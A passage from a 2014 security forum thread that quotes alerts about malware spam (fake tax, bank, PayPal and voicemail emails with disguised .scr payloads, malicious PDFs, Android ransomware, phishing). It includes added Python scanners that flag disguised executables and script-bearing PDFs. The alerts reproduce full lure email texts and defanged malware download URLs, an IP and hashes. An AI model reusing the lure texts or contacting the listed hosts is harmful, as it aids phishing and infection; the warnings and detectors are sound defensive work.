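        zf.writestr("readme.txt", b"plain text, benign")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_zip(build_sample_zip()):
        print(finding["member"], "->", "; ".join(finding["reasons"]))
```

The content check is what catches the case the extension check misses: a member whose name says .pdf but whose first bytes are a PE header.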

AplusWebMaster
2014-05-08, 14:11
FYI...

Infected malformed PDF attachments to emails
- http://myonlinesecurity.co.uk/infected-malformed-pdf-attachments-emails/
8 May 2014 - "We are now seeing lots of infected -malformed- PDF attachments to emails. The bad guys are changing the method of malware delivery with these emails and attaching a genuine PDF file to the email instead of a zip. These PDFs are -malformed- and contain a script virus that will infect you if you open the PDF and very likely when you preview it in your browser. They are using several well known and hopefully fully fixed exploits in older versions of Adobe reader. They attach what appears to be a genuine PDF file, that is malformed and has a script virus embedded. It depends on which version of Adobe reader you use, but older ones are definitely vulnerable to this exploit... It is vital that you make sure Adobe PDF reader is updated to the latest version 11.0.6* and if you use any alternative PDF reader then make sure that is fully updated. The majority of PDF exploits will affect ALL PDF readers, not just Adobe... these malformed PDFs do -not- preview and appear as plain blank pages in Windows 7 and Windows 8. The other thing that will help to avoid being unwittingly infected by these is to Set Adobe reader or any other PDF reader to open PDFs in the program and NOT in your browser... it is much safer to view them in the application itself which should be sand-boxed to prevent exploits slipping out..."
* https://helpx.adobe.com/security/products/reader/apsb14-01.html
___

Koler Trojan or other ransomware on Android
- http://blog.malwarebytes.org/mobile-2/2014/05/difficulty-removing-koler-trojan-or-other-ransomware-on-android/
May 7, 2014 - "A new Android ransomware dubbed Koler has been spreading as a fake adult themed streaming service ‘BaDoink’ app. Uncovered by security researcher Kafeine*, Koler uses familiar “Police Locker” tactics to get victims to pay a ransom for unlocking their PC or device. Traced back to the team that brought us the Reveton ransomware, Koler uses FBI and other police agency symbols to look legitimate, as well as carefully crafted text.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/akoler04b.jpg
While your files and other data are not encrypted by Koler.a, the annoying browser page takes over as the active window. Koler is delivered via site redirection; once installed and running, the device is taken over by the ransom browser page, and pressing the Home button or attempting to dismiss the page works for a very short time. The page will reappear when you attempt to open another app or within a few seconds. This causes removal problems because you don’t have enough time to uninstall through normal methods. Removal: The good news is you don’t have to pay the ransom to remove. First off, Malwarebytes Anti-Malware Mobile** detects as Android/Trojan.Koler.a and will prevent and remove this Trojan on your Android device. However, at times there are race conditions where Koler’s page is up and has control of the screen or you might not have a security tool installed... Safe Mode: The quickest manual solution would be to use Android’s Safe Mode, similar to Windows, Safe Mode is a diagnostic environment where third-party apps won’t load and you can remove..."
(See the Complete procedure at the malwarebytes URL above.)
* http://malware.dontneedcoffee.com/2014/05/police-locker-available-for-your.html

** https://www.malwarebytes.org/mobile/

Related: http://www.webroot.com/blog/2014/05/07/android-koler-android-based-ransomware/
May 7, 2014
- http://blog.kaspersky.com/new-ransomware-for-android/
May 8, 2014

:fear: :mad:
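A triage check for the kind of script-carrying PDF attachment described in the post above, as an added example that is not code from the quoted blog or from Adobe: it counts the PDF name objects (/JavaScript, /JS, /OpenAction, /AA, /Launch) that such files need to run code on open, after undoing #xx name escapes and inflating FlateDecode streams so names tucked into compressed objects are still seen. The sample PDFs are constructed inline; the name list and the stream regex are this example's own assumptions, in the spirit of pdfid-style scanning.

```python
"""Triage a PDF attachment for embedded script and auto-run actions.

Added example; the sample PDFs built below are constructed, not captured.
"""
from __future__ import annotations

import re
import zlib

# Name objects that an ordinary invoice or statement PDF almost never needs,
# but that a script-carrying PDF relies on to run code when it is opened.
RISKY_NAMES = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch")

# "stream ... endstream" bodies; zlib (FlateDecode) ones are inflated below.
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def normalize(pdf: bytes) -> bytes:
    """Expose names that a naive grep of the raw file would miss.

    Inflates every stream that decompresses cleanly as zlib and appends the
    result, then undoes #xx escapes (so /J#61vaScript reads as /JavaScript).
    Other filters, object streams and encrypted files are out of scope here.
    """
    inflated = []
    for m in STREAM_RE.finditer(pdf):
        try:
            inflated.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # image data or another filter; nothing to inflate
    text = b"\n".join([pdf, *inflated])
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), text)


def count_risky_names(pdf: bytes) -> dict[str, int]:
    """Count each risky name, matching whole names only (/JS but not /JSx)."""
    text = normalize(pdf)
    counts: dict[str, int] = {}
    for name in RISKY_NAMES:
        n = len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9])", text))
        if n:
            counts[name.decode()] = n
    return counts


def is_suspicious(pdf: bytes) -> bool:
    """Flag the file as soon as any script or auto-run action name is present."""
    return bool(count_risky_names(pdf))


def build_sample(with_script: bool) -> bytes:
    """Constructed minimal PDF (not a real sample) for a local run."""
    catalog = b"<< /Type /Catalog /Pages 2 0 R"
    if with_script:
        catalog += b" /OpenAction 3 0 R"
    objs = [catalog + b" >>", b"<< /Type /Pages /Kids [] /Count 0 >>"]
    if with_script:
        # The action dictionary sits in a FlateDecode stream, so a plain grep
        # of the raw bytes would see /OpenAction but not /JavaScript or /JS.
        action = zlib.compress(b"<< /S /JavaScript /JS (app.alert('constructed sample')) >>")
        objs.append(b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(action)
                    + action + b"\nendstream")
    out = b"%PDF-1.4\n"
    for i, obj in enumerate(objs, 1):
        out += b"%d 0 obj\n" % i + obj + b"\nendobj\n"
    return out + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    for label, sample in (("benign", build_sample(False)), ("scripted", build_sample(True))):
        verdict = "suspicious" if is_suspicious(sample) else "clean"
        print(label, verdict, count_risky_names(sample))
```

A hit from this scan is a reason to detonate the file in a sandbox or block it at the gateway, not a final verdict: a full parser is needed for object streams, non-zlib filters and encrypted PDFs, and legitimate forms do occasionally carry JavaScript.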

AplusWebMaster
2014-05-09, 15:49
FYI...

Fake HMRC SPAM / VAT0781569.zip
- http://blog.dynamoo.com/2014/05/hmrc-spam-vat0781569zip.html
9 May 2014 - "This -fake- HMRC spam comes with a malicious attachment:
Date: Fri, 9 May 2014 12:47:49 +0530 [03:17:49 EDT]
From: "noreply@ hmrc .gov .uk" [noreply@ hmrc .gov .uk]
Subject: Successful Receipt of Online Submission for Reference 0781569
Thank you for sending your VAT Return online. The submission for reference 0781569 was
successfully received on Fri, 9 May 2014 12:47:49 +0530 and is being processed. Make VAT
Returns is just one of the many online services we offer that can save you time and
paperwork.
For the latest information on your VAT Return please open attached report.
The original of this email was scanned for viruses by the Government Secure Intranet
virus scanning service supplied by Cable&Wireless Worldwide in partnership with
MessageLabs. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was
certified virus free.
Communications via the GSi may be automatically logged, monitored and/or recorded for
legal purposes.

It says "On leaving the GSi this email was certified virus free" which (as you might suspect) is utter bollocks, because it comes with a malicious payload. Attached to the message is an archive VAT0781569.zip which in turn contains two identical malicious executables AccountDocuments.scr and VAT090514.scr which have a VirusTotal detection rate of 15/52*. This is part one of the infection chain. Automated analysis... shows that components are then downloaded from the following locations:
[donotclick]bmclines .com/0905UKdp.rar
[donotclick]gamesofwar .net/img/icons/0905UKdp.rar
[donotclick]entslc .com/misc/farbtastic/heap170id3.exe
[donotclick]distrioficinas .com/css/b01.exe
The malicious binary heap170id3.exe has a VirusTotal detection rate of 9/52**. Automated analysis... shows that this makes a connection to a server at 94.23.32.170 (OVH, France). The other malicious binary, b01.exe had a VirusTotal detection rate of 11/52***. Analysis of this shows... that it attempts to connect to several different email services, presumably to send out spam."
* https://www.virustotal.com/en-gb/file/544a92787e291b3cad2d081be36616d49fb7d817f2aaac1a03e402f9a8404b6c/analysis/1399629443/

** https://www.virustotal.com/en-gb/file/1e8bf6e8b5188e28815ee6f28699c1df80d5ec3e541eca81c60fe2b9798e0850/analysis/1399629644/

*** https://www.virustotal.com/en-gb/file/e52554b0e4a717b7281abc8da4bba2c02a5636406d6db48fd20fb17a34ebdc0c/analysis/1399629683/
___

Fake Trusteer Security Update – PDF malware
- http://myonlinesecurity.co.uk/trusteer-important-security-update-fake-pdf-malware/
9 May 2014 - "... pretending to be from Trusteer Support is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Email reads:
Customer Number: 4086477
Important Security Update
Online Banking Protection Software Update from Trusteer
— THIS IS AN AUTOMATED RESPONSE. NO REPLY IS NECESSARY —
Please be sure to restart your computer after installing the new update
Sincerely, Trusteer Technical Support
Your internet banking account is valuable to fraudsters. That’s why criminals are always looking for new ways to get your online banking details and penetrate your account. Anti-virus and firewalls can’t detect the latest attacks, leaving you vulnerable.
To protect you against online fraud, please take a moment to Update Rapport – dedicated online banking security software from the experts at Trusteer. It only takes a few minutes to download and install, and there’s no need to restart your computer...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/05/Trusteer_Important-Security-Update.png

9 May 2014: derek_RaportUpdate.zip (24 kb) Extracts to Trusteer Update Now.scr
Current Virus total detections: 8/52* ...
This Important Security Update is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/b9510d6593b753aeb20f741a82f9ea3a96e6195bbc7a96a20ef954cf57632aff/analysis/

- http://threattrack.tumblr.com/post/85215426458/trusteer-spam
May 9, 2014
Tagged: Trusteer, Upatre

:mad: :fear::fear:
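The "spoofed icon" pattern in the posts above (a .scr, or a name such as something.pdf.exe, inside a .zip, shown as a PDF when Windows hides known extensions) can be caught before the archive reaches a desktop. The following is an added example and not code from the quoted blogs: it opens a zip attachment and flags members with an executable extension, a document-style double extension, or a PE ("MZ") header under a document extension. The archive is constructed inline from file names seen in these reports with dummy bytes rather than the real samples; the extension lists are this example's own choices.

```python
"""Flag executables masquerading as documents inside a zip attachment.

Added example; the archive built below is constructed, not a real sample.
"""
from __future__ import annotations

import io
import zipfile

# Extensions Windows runs on double-click; the spam runs on this page ship
# .scr and .exe inside .zip attachments.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js"}
# Document types the lures claim to be (invoice "PDF", voicemail "WAV", ...).
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".wav", ".txt", ".jpg"}

# File signatures compared against the claimed extension.
MAGIC = ((b"MZ", "pe"), (b"%PDF", "pdf"), (b"PK\x03\x04", "zip"), (b"RIFF", "riff"))


def sniff(head: bytes) -> str:
    """Coarse file type from the leading bytes; 'unknown' when nothing matches."""
    for magic, kind in MAGIC:
        if head.startswith(magic):
            return kind
    return "unknown"


def extensions(name: str) -> list[str]:
    """All extensions of a member name, lower-cased: 'a.pdf.exe' -> ['.pdf', '.exe']."""
    base = name.rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    return ["." + p for p in parts[1:]] if len(parts) > 1 else []


def inspect_archive(data: bytes) -> dict[str, list[str]]:
    """Map each suspicious member name to the reasons it was flagged."""
    findings: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            exts = extensions(info.filename)
            last = exts[-1] if exts else ""
            with zf.open(info) as fh:
                kind = sniff(fh.read(8))  # header bytes only; nothing is written to disk
            reasons = []
            if last in EXECUTABLE_EXTS:
                reasons.append(f"executable extension {last}")
            if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS and last in EXECUTABLE_EXTS:
                reasons.append(f"double extension {exts[-2]}{last}, shown as {exts[-2]} "
                               "when known extensions are hidden")
            if last in DOCUMENT_EXTS and kind == "pe":
                reasons.append("PE (MZ) header under a document extension")
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_attachment() -> bytes:
    """Constructed zip using names from the reports above; contents are dummy bytes."""
    fake_pe = b"MZ\x90\x00" + b"\x00" * 60  # DOS header stub, not a runnable binary
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("PP_detalis_726716942049.pdf.exe", fake_pe)
        zf.writestr("Statement-pdf.scr", fake_pe)
        zf.writestr("VOICE933-947-8474.wav", fake_pe)
        zf.writestr("Invoice_genuine.pdf", b"%PDF-1.4\n%constructed benign file\n")
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in inspect_archive(build_sample_attachment()).items():
        print(member, "->", "; ".join(reasons))
```

The same rules are cheap to apply at a mail gateway, and the header check matters because a renamed .scr still starts with MZ whatever icon it carries. The reports above also show nested archives (a .rar inside a .zip) and a 0/52 VirusTotal score at first sight, so this kind of structural check complements rather than replaces signature scanning.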

AplusWebMaster
2014-05-12, 22:18
FYI...

Fake PayPal SPAM – PDF malware
- http://myonlinesecurity.co.uk/paypal-notification-payment-received-fake-pdf-malware/
12 May 2014 - "PayPal Notification of payment received is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. These emails are absolutely identical to the genuine emails that you receive from PayPal when someone sends you money, especially after selling something on eBay. The difference is the link to the transaction goes to a fake site that tries to download a malware file to your computer, that appears to be a PDF...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/05/paypal_new_funds.png

12 May 2014: PP_detalis_726716942049.pdf.exe (485 kb)
Current Virus total detections: 0/51*
This PayPal Notification of payment received is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/fef606db754a8397d52fcb830934caace186e09a3dd80f865389d867c31e265f/analysis/
___

BBB SPAM - Washington Metro Area ...
- http://threattrack.tumblr.com/post/85542924523/better-business-bureau-of-washington-metro-area-spam
12 May 2014 - "Subjects Seen:
RE:Case #2475314
Typical e-mail details:
Owner/Manager
The Better Business Bureau has received the above-referenced complaint from one of your customers regarding their dealings with you. The details of the consumer’s concern are included on the reverse. Please review this matter and advise us of your position. FILE ATTACHED (Adobe Photoshop format)
As a neutral third party, the Better Business Bureau can help to resolve the matter. Often complaints are a result of misunderstandings a company wants to know about and correct...
We look forward to your prompt attention to this matter.
Sincerely, BBB of Metropolitan Washington DC and Eastern Pennsylvania

Malicious File Name and MD5:
Complaint.zip (F72C05A0A0C4C188B07ECE7806CC0F44)
ComplaintToManager.scr (F89D06A787094FE2DC1AF6B2C0914C17)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/9e0c566c3d7d004c164e1c0521c93446/tumblr_inline_n5h4knHQFX1r6pupn.png

Tagged: bbb, Upatre

- http://myonlinesecurity.co.uk/better-business-bureau-complaint-fake-pdf-malware/
12 May 2014 - "Better Business Bureau Complaint with subject of RE:Case #8396880 pretending to come from Refugio Ratliff [Refugio_Ratliff@ bbb .org] is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers...
Email looks like:
May 12, 2014
Owner/Manager
The Better Business Bureau has received the above-referenced complaint from one of your customers regarding their dealings with you. The details of the consumer’s concern are included on the reverse. Please review this matter and advise us of your position. FILE ATTACHED (Adobe Photoshop format)
As a neutral third party, the Better Business Bureau can help to resolve the matter. Often complaints are a result of misunderstandings a company wants to know about and correct...
We look forward to your prompt attention to this matter.
Sincerely,
BBB of Metropolitan Washington DC and Eastern Pennsylvania

12 May 2014: Complaint.zip (7 kb) Extracts to ComplaintToManager.scr
Current Virus total detections: 2/52*
... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/6c7d3eb6880978486664a7e408c0cbbd35dd9ef8608874e94107564b12012998/analysis/
___

“Your Photos Are being Used” Phish
- http://blog.malwarebytes.org/fraud-scam/2014/05/your-photos-are-being-used-phishing-lure/
May 12, 2014 - "We’re seeing some reports that an old favourite of scammers everywhere is currently in circulation on social media sites such as Tumblr. If you receive a message from a friend which says:
OMG YOUR PHOTOS ARE BEING USED ON THIS SITE
then be very careful should you happen to click the link, because you may well be sent to a fake login page. In this case, the scammers use some JavaScript to bounce the victim from a Tumblr spam blog to a fake Facebook login which they’ll need to use to see the supposed photos. Anybody filling in their details and hitting enter will of course have their username and password sent to the attacker.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/tumblr.png
...
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/phish-fb.png
This sort of scam is often seen on Twitter, and regularly puts in a guest appearance or twelve on other sites. Any urgent-sounding messages sent your way which suggest imminent personal embarrassment of some description should be treated with healthy skepticism until you’ve confirmed that a) the message is genuine and b) it really was worth saving up for a one way ticket to the Sahara desert all those years ago. It’s very likely you’re going to be fine – however, you won’t be able to say the same for accounts being handed over to a scammer using a little shock and awe (but mostly shock) as a bait to spirit away some logins."
___

- http://blog.trendmicro.com/trendlabs-security-intelligence/phishers-cast-wider-net-now-asking-for-multiple-emails/
May 12, 2014 - "... Users should be wary of clicking shortened URLs, especially if they come from unverified sources. It’s recommended that they simply use bookmarks or type in the site’s URL directly into the address bar to avoid phishing pages. They should also double-check a site’s URL before they give out any user information; it has become all too easy for bad guys to create login pages that are near-identical to legitimate ones..."

:mad: :fear::fear:

AplusWebMaster
2014-05-14, 13:42
FYI...

Paypal Phish Flood
- http://blog.malwarebytes.org/fraud-scam/2014/05/paypal-phishing-flood/
May 13, 2014 - "... noticed a trend in phishing scams over the last week, namely that a specific style of PayPal phish e-mail has been flooding potential victims. The text of the phishing e-mail includes:
Dear Member,
Recently, there's been activity in your PayPal account that seems unusual compared to your normal account activities. Please log in to PayPal to confirm your identity and update your password and security questions.
To help protect your account, no one can send money or withdraw money. In addition, no one can close your account, send refunds, remove any bank accounts, or remove credit cards.
Click here to login <- Phishing Page
What's going on?
We're concerned that someone is using your PayPal account without your knowledge. Recent activity on your account seems to have occurred from a suspicious location or under circumstances that may be different than usual.
What to do
Log in to your PayPal account as soon as possible. We may ask you to confirm information you provided when you created your account to make sure you're the account holder. We'll then ask you to change your password and security questions...

They then advise to wait until PayPal responds within 72 hours after all tasks are complete, however we know that by that time, any credit or accounts associated with your PayPal login are likely to be compromised. We have seen a massive amount of domains being employed to host the actual phishing page, which looks like this:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/imgmediatortimes.com_-_PayPal_Phish.png
In addition to the many locations this -scam- is being hosted, the amount of observed IP addresses sending the phishing attack is so far over 500. So keep an eye out for any such scam. In addition, there seems something oddly ‘phishy’ about the pattern of these attacks and as we uncover more we will update this post..."
___

Fake Computer Support Services invoice – PDF malware
- http://myonlinesecurity.co.uk/computer-support-services-fake-invoice-fake-pdf-malware/
13 May 2014 - "Computer Support Services fake invoice with subject of Computer Support Services JJBCL0104291 pretending to come from Computer Support Services < random names @ blacjj .co .uk > is another one from the current bot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers... email looks like
Dear Carole We have created a new invoice for you. To view your statement including a pdf of this invoice please download the attachment.
Invoice Details
Invoice Number:
Description: 1/4/14 – 30/4/14
Amount: £67.80
Payment Details
Account Number: 01706454
Sort Code: 400822
Account Name: Computer Support Services
Kind Regards, Jennifer Eden Computer Support Services T: 0161 8505080 F: 0161 929 0049 W: www. blackjj .co .uk

13 May 2014 Report_ID30D74D9365D2AC998DC.zip (63 kb) : Extracts to invoice_65476859394857_pdf.exe
Current Virus total detections: 0/52*
This Computer Support Services fake invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/26dfd88fc6bbb40f6ccc9379160a6a65931eab1ba70734ba1f06cb4056cb56e7/analysis/
___

Citibank Commercial Banking Form Spam
- http://threattrack.tumblr.com/post/85731142878/citibank-commercial-banking-form-spam
May 14, 2014 - "Subjects Seen:
Important - Commercial Form
Typical e-mail details:
Please scan attached document and fax it to +1 800-285-6016 .
All web filed documents (with the exception of downloaded accounts templates) are available to view / download for 10 days after their original submission. Once accepted, these changes will be displayed on the public record. Not yet filing your accounts online? See how easy it is… For enquiries, please telephone the Service Desk on +1 800-285-0106 or email enquiries@ citibank .com. This email was sent from a notification-only email address which cannot accept incoming mail. Please do not reply directly to this message.
Yours faithfully
Lilly Mccann
Commercial Banking
Citibank N.A
Lilly.Mccann@ citibank .com

Malicious File Name and MD5:
CommercialForm.zip (5881899D33E80B0B33139BBDED43D9BB)
CommercialForm.scr (F7F5269B1031FF35B8F4DF1000CBCBBB)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/12d37a6e4d32484f3ea6283c63542d9f/tumblr_inline_n5koqnxVdL1r6pupn.png

Tagged: Citibank, Upatre
___

Microsoft Exchange Voice mail Spam
- http://threattrack.tumblr.com/post/85725818528/microsoft-exhange-voice-mail-spam
May 14, 2014 - "Subjects Seen:
You have received a voice mail
Typical e-mail details:
You received a voice mail : VOICE933-947-8474.wav (24 KB)
Caller-Id: 933-947-8474
Message-Id: XA6TL3
Email-Id: <email address>
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server

Malicious File Name and MD5:
VoiceMail.zip (B41AF487FC1D362DF736EAC5E14CF5FF)
VoiceMail.scr (DDBA4AD13DE7D5AE604729405C180D65)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a8dcfb3209de8ba149afaed92a5e21d9/tumblr_inline_n5kl642QEg1r6pupn.png

Tagged: Voicemail, Upatre

:fear::fear: :mad:

AplusWebMaster
2014-05-15, 19:19
FYI...

Fake NatWest SPAM ...
- http://myonlinesecurity.co.uk/natwest-statement/
15 May 2014 - "NatWest Statement is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers... Email looks like:
View Your April 2014 Online Financial Activity Statement
Keep track of your account with your latest Online Financial Activity Statement from NatWest Bank. It’s available for you to view at this secure site. Just click to select how you would like to view your statement:
View/Download as a PDF
View all EStatements
So check out your statement right away, or at your earliest convenience...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/05/natwest-statement.png

15 May 2014: Statement-pdf.zip (14 kb) : Extracts to Statement-pdf.scr
Current Virus total detections: 7/53*
This NatWest Statement is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/513946f92ace2ba7733a7d7d922a23c31c28ab60163ba91f63aede8aca271030/analysis/

- http://blog.dynamoo.com/2014/05/natwest-statement-spam-contains-bitly.html
15 May 2014 - "This -fake- NatWest spam sends victims to a malicious download via a bit.ly link... The link in the email goes to [donotclick]bit .ly/1jKW2GJ which then downloads a malicious file Statement-pdf.scr which has a VirusTotal detection rate of 8/53*...
* https://www.virustotal.com/en-gb/file/513946f92ace2ba7733a7d7d922a23c31c28ab60163ba91f63aede8aca271030/analysis/1400164292/
___

Fake 401K Fund Spam
- http://threattrack.tumblr.com/post/85822053523/401k-fund-performance-spam
May 15, 2014 - "Subjects Seen:
401k April 2014 Fund Performance and Participant Communication
Typical e-mail details:
Co-op 401k Plan Participants
Attached you will find the April 2014 401k fund performance results as well as an informational piece regarding online calculators available on the website.
If you are a facility manager, please forward, print or post a copy of these pages on your bulletin board or in a conspicuous place where your employees can see them.
Please contact me if you have any questions.
Elsie Mosley
Employee Benefits/Plan Administrator...

Malicious File Name and MD5:
April-2014-401k-Fund.zip (B5B2231F7110B15F70DB7968134A5A98)
April-2014-401k-Fund.scr (81928270710BAD7443BDBCAA253E4094)

Screenshot: https://31.media.tumblr.com/eb6512d56ecfd85bd1d1f26c8cd7e181/tumblr_inline_n5mfb6Pc4p1r6pupn.png

Tagged: 401K, Upatre
___

Fake justice .co.uk - REMINDER NOTICE ...
- http://myonlinesecurity.co.uk/fake-justice-co-uk-reminder-notice-ignore/
15 May 2014 - "Fake justice .co.uk REMINDER NOTICE DO NOT IGNORE is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... a spurious parking ticket, hoping to extort a large sum of money from you...

UK central Police svc notice: http://www.actionfraud.police.uk/alert-beware-of-justice.gov.uk-scam-parking-fine-emails-mar14

Email looks like:
REMINDER NOTICE DO NOT IGNORE
To: submit@ thespykiller .co .uk Case: C5067787
Please print attached form and fax it to +44 020 4869 0219 Your vehicle was recorded parked on our Clients Private Property driveways on the 15.05.2014 and remained on site for 2 hour 28 min. A notice was sent to you on 10.04.2014 which gave 28 days to pay full PARKING CHARGE or challenge the issue. The amount of £78.00 is now due...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/05/REMINDER-NOTICE-DO-NOT-IGNORE.png

15 May 2014: Form-STD-Vehicle-150514.zip (11 kb) Extracts to Form-STD-Vehicle-150514.scr
Current Virus total detections: 5/53*
... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/33834c0d60f3aeaedcce3de326517df8dc96b5a8515f171f16154f21d5705ce4/analysis/

:fear: :mad:

AplusWebMaster
2014-05-19, 17:57
FYI...

Fake TT PAYMENT COPY - SPAM ...
- http://blog.dynamoo.com/2014/05/tt-payment-copy-spam.html
19 May 2014 - "This spam has a malicious attachment:
Date: Sun, 18 May 2014 20:54:20 -0700 [05/18/14 23:54:20 EDT]
Subject: Re TT PAYMENT COPY
please confirm the attachment payment Copy and get back to me?

Attached is an archive file TT PAYMENT COPY.zip which in turn contains another archive file TT PAYMENT COPY.rar (which relies on the victim having a program to uncompress the RAR file). Once that is done, a malicious executable PaySlip.exe is created. This file has a VirusTotal detection rate of 27/53*. Automated analysis tools... don't reveal what is happening, but you can guarantee it is nothing good."
* https://www.virustotal.com/en-gb/file/8f9be78de7117833112b579ce52d7cb862ab0b9c00ac282b4050d96f1ecef463/analysis/1400507439/
___

High Fashion to High Risk ...
- http://blog.malwarebytes.org/fraud-scam/2014/05/from-high-fashion-to-high-risk/
May 19, 2014 - "... Suffice to say that several Fashion Weeks have come and gone since 2014 started... more runway events have been announced and are already scheduled to happen within the next two to three weeks... it’s highly likely that you may encounter the sites we’ve found these past few days. We have also noted that such sites have increased in number, with most of them carrying the brands Louis Vuitton, Chanel, Gucci, Hermes, and Oakley.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/fantasylouisvuitton.png
...
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/guccioutlet.png
... What fantasylouisvuitton, guccioutlet, and fashionshop-usa have in common goes beyond not having an easy way for anyone to verify the products they sell for authenticity. All these sites redirect to random JS (JavaScript) scripts hosted on js(dot)users(dot)51(dot)la, a site that has been associated with many -malicious- activities in the past*. Google Safe Browsing flags it as “suspicious”... Meanwhile, Tumblr users have been inundated with spam posts from users claiming to be students who have put up their own personal fashion site and wishing others to visit it. This is an old Tumblr scam designed to encourage the clicking of adverts, which is often against the Terms of Service (ToS) of many advertising networks and can be seen as a form of click fraud. In this case, scammers specifically looked for those interested in fashion... When it comes to dealing with scams and potentially risky websites, users are always at the losing end. Thus, avoiding such sites, in general, and sticking to visiting legitimate and/or official selling sites of popular brands are best practices to keep in mind."
* https://www.virustotal.com/en/domain/js.users.51.la/information/
___

Targeted Attack Trends - 2H 2013
- http://blog.trendmicro.com/trendlabs-security-intelligence/targeted-attack-trends-a-look-at-2h-2013/
May 19, 2014 - "Targeted attacks are known to use zero-day exploits. However, old vulnerabilities are still frequently exploited. In fact, based on cases analyzed in the second half of 2013, the most exploited vulnerability in this time frame was CVE-2012-0158, a Microsoft Office vulnerability that was patched in April 2012. This shows how important applying the latest patches and security updates is in mitigating the risks posed by these threats.
Most commonly exploited vulnerabilities related to targeted attacks
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/05/tareport2.jpg
... Spear phishing* is still the most seen entry point for targeted attacks. These email messages use relevant-sounding subjects that trick users into opening them and the file attachments therein that serve as malware carriers. In our 2014 prediction, we noted that mobile devices will also be leveraged by threat actors to gain entry to networks... Although targeted attacks are difficult to detect, this task can be made easier with solutions that use advanced threat detection technology that can detect, analyze, and respond to attacks that traditional antivirus signature-based solutions and blacklisting are not capable of. Targeted attacks often leave traces that can serve as indicators of compromise. As such, enterprises and large organizations are encouraged to build their own threat intelligence capability, which they can incorporate into their own existing security solutions..."
> http://about-threats.trendmicro.com/us/threat-intelligence/targeted-attacks/targeted-attack-trends/report-threat-targets-diversify-in-2h-2013
... The latter half of 2013 also bore witness to a series of threat landscape updates that show the aggressive stance of present-day attackers... While bad actors prefer using tried-and-tested attack vectors, such as spear-phishing emails, vulnerabilities, and malware, research shows that they are on the move in terms of diversifying their victims all over the world..."
* http://searchsecurity.techtarget.com/definition/spear-phishing

- http://www.secureworks.com/resources/blog/research/apt-campaign-leverages-the-cueisfry-trojan-and-microsoft-word-vulnerability-cve-2014-1761/
May 16, 2014

- http://www.reuters.com/article/2014/05/19/us-cybercrime-usa-china-idUSBREA4I09420140519
